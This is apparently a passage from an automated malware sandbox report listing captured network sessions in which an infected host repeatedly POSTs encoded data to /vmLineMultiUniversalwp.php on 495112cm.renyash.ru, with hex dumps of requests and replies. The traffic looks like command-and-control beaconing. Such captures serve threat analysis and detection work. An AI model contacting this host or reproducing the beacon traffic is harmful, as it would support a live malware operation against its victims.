                                                                                          Data Ascii: T\^_UR_S\[RXW[XRXVZ[R\Q[^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.D=*/A )' ?\*/1]#=[$.+!-9),?X*6 "^*;!Y#!Y,"
                                                                                          Jan 4, 2025 11:09:15.014744997 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:15.332885027 CET958INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:15 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jPBwyGCAcFxizMjSxewHogvvrFvZ63y%2BXjWrrOoM1mdne1e45sdz%2Byyn0puJZuh%2F0VOXf77z9Lill9LkExbc%2F3dM7lg972Iu%2BPwFQ9KOjqd3gYOzfVFbWUSDG2Chqjz7L03mPf9j"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e948dc77c7b-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8503&min_rtt=2028&rtt_var=13711&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2161&delivery_rate=27120&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 24 1e 3c 07 3b 0d 35 2f 37 05 3d 07 2e 5a 32 33 30 1c 2f 22 30 06 20 2c 24 02 38 31 32 05 27 0a 3c 59 2a 06 23 0f 34 20 30 08 33 1a 2a 5d 06 12 38 10 3f 5a 21 03 32 2b 2a 54 2a 1c 00 43 30 18 26 10 24 3e 2b 58 28 02 00 05 31 05 3e 0c 3d 11 0c 5a 2d 14 24 05 2f 3c 37 0c 35 03 21 53 08 13 20 1c 26 1f 20 0c 2a 30 1c 02 25 23 39 5a 30 03 2c 0d 3d 28 23 0a 30 00 21 03 2e 21 2c 05 3c 23 0a 5b 3a 58 27 05 3e 2e 2c 0c 24 3c 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98$<;5/7=.Z230/"0 ,$812'<Y*#4 03*]8?Z!2+*T*C0&$>+X(1>=Z-$/<75!S & *0%#9Z0,=(#0!.!,<#[:X'>.,$<"\ #V=WL0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          121192.168.2.450129104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:14.688175917 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2516
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:15.045680046 CET2516OUTData Raw: 51 5e 5b 57 55 5f 5a 55 5c 5b 52 58 57 5a 58 5c 58 53 5a 58 52 5c 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q^[WU_ZU\[RXWZX\XSZXR\QV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-), *20 **"-=]'>V %+?/_?%(49=;!Y#!Y,>
                                                                                          Jan 4, 2025 11:09:15.140857935 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:15.402926922 CET805INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:15 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u0KcrBB0GnXUaZRj4wdBCNd2Avkq0NNTht4VwJLOlkjgVFalcqomkE9vIu9qLV2aa8zX2J%2Flb7nI%2Bo8cyVsASd7jo%2BYeUDfvpYbHkA9wjhAmnLnYp7z9MGyPwty44oGXQecgZyK3"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e955a6843b1-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=10241&min_rtt=1743&rtt_var=17651&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2833&delivery_rate=20937&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          122192.168.2.450130104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:15.531363010 CET293OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:09:15.889379978 CET2520OUTData Raw: 54 5e 5e 55 55 53 5a 53 5c 5b 52 58 57 59 58 58 58 55 5a 5a 52 57 51 5e 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T^^UUSZS\[RXWYXXXUZZRWQ^^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.*481 )?:!)$+#>?#Y?%77:[);!Y#!Y,*
                                                                                          Jan 4, 2025 11:09:15.995697975 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:16.180206060 CET813INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:16 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y%2FL7pCs72Rp9PdnTHNbQsiuh%2B%2BPrcMAodYAlm7qFGgMxotL4tF%2BeATDxvDsMKcyrHCebvATLztczMKdQtq8NpGJz2bDmfq4MR0%2FDSMXyXL1f2F6QZE0VKL5G7jHZVwH%2Fx8ULC7B%2B"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e9aae10c402-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3081&min_rtt=1519&rtt_var=3694&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=104144&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          123192.168.2.450131104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:16.311307907 CET293OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:09:16.670650005 CET2520OUTData Raw: 54 5a 5e 55 55 5d 5f 56 5c 5b 52 58 57 5c 58 5e 58 50 5a 5f 52 56 51 5a 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TZ^UU]_V\[RXW\X^XPZ_RVQZ^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-=9E#+*%'><2#=\0X#R4>>S(?3]?%$49*;!Y#!Y,>
                                                                                          Jan 4, 2025 11:09:16.763010979 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:16.942523003 CET805INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:16 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7ztqdHnp6eVfRE3UboyovmBVTTwsWUQSJemHA0DRQSsV9KohrpKs%2BiZV2950d5FjL7JU%2BdtJxOeWJh57sb74G0gXgH%2BD0kh6RKkQ42ShTOiX3XM47dTYHnay8OcM0ovgfimBnoAM"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e9f79934229-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8376&min_rtt=1686&rtt_var=14013&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=26444&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          124192.168.2.450132104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:17.069988966 CET293OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:09:17.420772076 CET2520OUTData Raw: 51 59 5b 52 50 5b 5a 50 5c 5b 52 58 57 58 58 5f 58 56 5a 59 52 57 51 5b 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QY[RP[ZP\[RXWXX_XVZYRWQ[^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.*9#C#^!U10'^=/1Z"0> 4.S<<$*%<72);!Y#!Y,.
                                                                                          Jan 4, 2025 11:09:17.517518044 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:17.782913923 CET802INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:17 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AqnhKJCjgjJclOaEmfzoGTqB18MBwdmwrUn7tw80YBfVmUlDxnyqiT4UUOGOQg5r1ql0ZtIx6Wa3WWqyxBVKyTnbzXFnx6Iw2nHsLtElD53viSv7d5%2FR5C1Tr%2FvekuqXZnAhgOG7"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6ea43db7c33e-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3820&min_rtt=1609&rtt_var=5026&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=75643&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          125192.168.2.450133104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:17.906748056 CET293OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:09:18.264511108 CET2520OUTData Raw: 54 5c 5b 50 55 5b 5a 5c 5c 5b 52 58 57 52 58 5c 58 51 5a 58 52 54 51 5c 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T\[PU[Z\\[RXWRX\XQZXRTQ\^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.C)*3@#+%U2Y*,%!=Z00 .&P(,,(8#-2Y=;!Y#!Y,
                                                                                          Jan 4, 2025 11:09:18.358923912 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:18.623604059 CET802INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:18 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fZrNtk4X8DzQhQD0uNM7NkaXJGbPpN%2Fu056yvZzBNJAg0w51lbuH8pMpK6th8zynpirabf0kqYdzLFBZNs28G5FQuJCcJ2CMIlH67DfHjNo2NAKFAsPXAh0XBS4oBieW2WGJYw%2Fa"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6ea97fcc4257-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4607&min_rtt=1859&rtt_var=6193&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=61231&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          126192.168.2.450134104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:18.965013981 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:19.311288118 CET2520OUTData Raw: 54 50 5b 53 50 5c 5f 56 5c 5b 52 58 57 59 58 5a 58 57 5a 5d 52 55 51 5b 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TP[SP\_V\[RXWYXZXWZ]RUQ[^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-*:#@4^%T'04=!5]'#P!.)(?_(<7=*!Y#!Y,*
                                                                                          Jan 4, 2025 11:09:19.428275108 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:19.611720085 CET804INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:19 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PtPtmV4QYRTEG97SHKr4DyC2wM43x%2BNIzjmNTK5uA0gq3EpiOZEMLq2jKBAFDoYjwiKLqwQRONN8skwvmZ0fcqtcMqx6KjuJZ8ZBIB0X6%2B%2FX4EOkC38rOeY3tRVnp5WD7YcEwF5V"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6eb01aad4398-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3896&min_rtt=1757&rtt_var=4937&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=77367&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          127192.168.2.450135104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:19.734494925 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:20.092561960 CET2520OUTData Raw: 51 59 5e 5e 55 53 5f 56 5c 5b 52 58 57 5c 58 58 58 57 5a 5d 52 50 51 59 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QY^^US_V\[RXW\XXXWZ]RPQY^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.>:#C"8!W23>"=3;R#6W+,+'^4^*!Y#!Y,>
                                                                                          Jan 4, 2025 11:09:20.198318958 CET25INHTTP/1.1 100 Continue


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          128192.168.2.450136104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:20.348364115 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:20.701998949 CET1844OUTData Raw: 51 5e 5e 53 50 58 5f 54 5c 5b 52 58 57 52 58 5d 58 52 5a 5d 52 53 51 58 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q^^SPX_T\[RXWRX]XRZ]RSQX^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.C*9/@ %1;=%Z5"'>'Q7!<<;Y(&<#=9+;!Y#!Y,
                                                                                          Jan 4, 2025 11:09:20.820436001 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:21.079746962 CET958INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:21 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mRDOJLOUTSZV118%2BYr5SFOSkElons%2Fig1J%2BefUTHMuH87Dbre7sQyKVwzhmewSCdVVS%2BNypSzbj9SvtsRGwx0SsRDFSziz%2FM1SbJuopMLcUlfK7KIXoUZkTiO12Fe5RYK7J6Xev9"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6eb8dde04268-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8015&min_rtt=1947&rtt_var=12866&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2161&delivery_rate=28916&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 27 0d 3c 3e 24 56 22 06 37 00 3d 3e 00 5b 26 1e 05 07 38 0f 33 5f 20 5a 38 07 2c 21 21 1f 27 30 20 5f 2a 06 20 1d 21 30 0d 56 27 20 2a 5d 06 12 38 5f 3e 3c 2a 10 32 05 22 10 3e 54 39 1b 26 36 29 01 24 04 3f 58 3c 3c 29 5e 26 2c 31 1d 2a 2f 29 03 39 5c 3c 47 2f 02 24 1c 36 03 21 53 08 13 20 55 24 31 23 57 2a 30 3e 00 31 33 3d 5d 27 29 34 0d 2a 5e 3c 16 33 10 2e 5a 2d 08 3b 1e 3f 33 05 03 2d 07 3c 5c 2b 2d 3c 0d 25 3c 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98'<>$V"7=>[&83_ Z8,!!'0 _* !0V' *]8_><*2">T9&6)$?X<<)^&,1*/)9\<G/$6!S U$1#W*0>13=]')4*^<3.Z-;?3-<\+-<%<"\ #V=WL0


                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                          129192.168.2.450137104.21.38.8480
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:09:20.470508099 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:09:20.826977015 CET2520OUTData Raw: 54 5a 5b 52 55 59 5a 51 5c 5b 52 58 57 58 58 5d 58 57 5a 53 52 54 51 5e 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TZ[RUYZQ\[RXWXX]XWZSRTQ^^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.*:#C"85V&\=<">%X$?#6S+?8+ 41*!Y#!Y,.
                                                                                          Jan 4, 2025 11:09:20.928818941 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:09:21.192871094 CET800INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:09:21 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5PeUdajlyIw8Oll7O43UHla3gf9XYUVUZGynbF4aRiJsqsB8uRncwI0HM5d4SKYJJdrCCkt1leXlz1ELokS2YCPOw0Nf5Qr8ljOff3vtcYYgees3k3ascwTEa7r4jBdg%2FUpNpulg"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6eb98f3843af-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3693&min_rtt=1705&rtt_var=4617&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=82879&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


